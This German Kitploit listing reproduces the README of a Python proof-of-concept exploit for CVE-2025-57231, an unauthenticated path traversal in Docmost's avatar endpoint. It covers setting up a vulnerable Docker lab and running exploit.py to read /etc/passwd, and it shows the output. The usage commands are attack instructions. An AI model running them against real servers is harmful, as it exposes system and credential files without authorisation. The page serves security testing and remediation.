Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-57231 — Python-PoC-Exploit für CVE-2025-57231, einen unauthentifizierten Path Traversal in Docmost < 0.22.0, der beliebige Dateien über den Avatar-Endpunkt liest. | Kitploit
Tools/GitHubGitHub/anirbala98/cve-2025-57231
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubanirbala98/cve-2025-57231

CVE-2025-57231

Python-PoC-Exploit für CVE-2025-57231, einen unauthentifizierten Path Traversal in Docmost < 0.22.0, der beliebige Dateien über den Avatar-Endpunkt liest.

Repository anzeigen
1vor 4h 20mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-57231 - Docmost < 0.22.0 - Beliebiges Dateilesen

Dieses Repository enthält einen Proof of Concept (PoC)-Exploit für CVE-2025-57231.

Haftungsausschluss

Dieses Projekt wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben.

Übersicht

Eine Directory-Traversal-Schwachstelle in Docmost ermöglicht das beliebige Lesen von Dateien von Version 0.2.1 bis 0.21.0. Der Endpunkt /api/attachments/img/avatar der Anwendung validiert Dateipfade nicht ordnungsgemäß und ist ohne jegliche Authentifizierung öffentlich zugänglich. Dadurch können nicht authentifizierte Angreifer beliebige Dateiinhalte vom Ziel abrufen, indem sie den /avatar-Endpunkt mit %2F-Sequenzen sondieren.

Betroffene Version

Alle Docmost-Versionen von 0.2.1 bis 0.21.0 sind betroffen.

Voraussetzungen

  • Python 3.13.14
  • Requests 2.32.5

Einrichtung der verwundbaren Umgebung

Voraussetzungen: Docker und Docker Compose installiert

  1. Erstellen Sie ein Home-Verzeichnis und laden Sie die docker-compose-Datei herunter
root@kitploit:~
mkdir docmost
cd docmost
curl -O https://raw.githubusercontent.com/docmost/docmost/main/docker-compose.yml
  1. Bearbeiten Sie die docker-compose.yml-Datei
root@kitploit:~
# Generate a long random secret key
openssl rand -hex 32

# Open the docker-compose.yml file and make the following changes:
# 1. Replace `image: docmost/docmost:latest` with `image: docmost/docmost:0.21.0`
# 2. Replace `APP_SECRET` with the random secret key generated above 
  1. Starten Sie den Container
root@kitploit:~
sudo docker-compose up -d
  1. Geben Sie die Workspace-Details ein

Navigieren Sie zu http://localhost:3000/ und geben Sie Dummy-Details für Workspace-Name, Name, E-Mail und Passwort ein

Installation des Exploits

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2025-57231.git
cd CVE-2025-57231/
pip install -r requirements.txt

Verwendung

root@kitploit:~
python exploit.py <base_url> -f <file location>
python exploit.py http://localhost:3000/ -f /etc/passwd

Beispiel

root@kitploit:~
└─$ python exploit.py http://localhost:3000/ -f /etc/passwd
[*] Attempting to read arbitrary file

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh

Behebung

Aktualisieren Sie das Plugin auf Version 0.22.0.

Referenzen

  • https://github.com/advisories/GHSA-59m3-fj8c-996g
  • https://nvd.nist.gov/vuln/detail/CVE-2025-57231
  • https://www.artresilia.com/docmost-v0-21-0-cve-2025-57231-unauthenticated-file-path-traversal
Tool herunterladen